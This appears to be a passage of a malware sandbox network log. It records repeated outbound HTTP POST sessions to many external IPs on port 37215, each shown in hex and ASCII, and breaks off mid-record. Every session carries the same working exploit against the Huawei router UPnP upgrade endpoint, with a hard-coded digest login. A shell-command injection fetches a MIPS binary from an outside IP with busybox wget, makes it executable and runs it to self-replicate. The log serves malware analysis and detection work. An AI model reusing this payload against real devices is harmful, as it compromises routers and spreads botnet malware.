                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1189192.168.2.1360886157.40.12.19437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.521688938 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1190192.168.2.1353766209.100.119.5437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.521719933 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1191192.168.2.135472841.145.151.20737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.521781921 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1192192.168.2.1340678197.223.114.17737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.521789074 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1193192.168.2.1337104178.147.164.24037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.521812916 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1194192.168.2.135501461.195.0.5337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.522367001 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1195192.168.2.134977641.10.108.2537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.522397041 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1196192.168.2.1337976157.23.46.16737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.522460938 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1197192.168.2.1346526197.166.36.11337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.522530079 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1198192.168.2.133487267.221.46.7237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.522716045 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 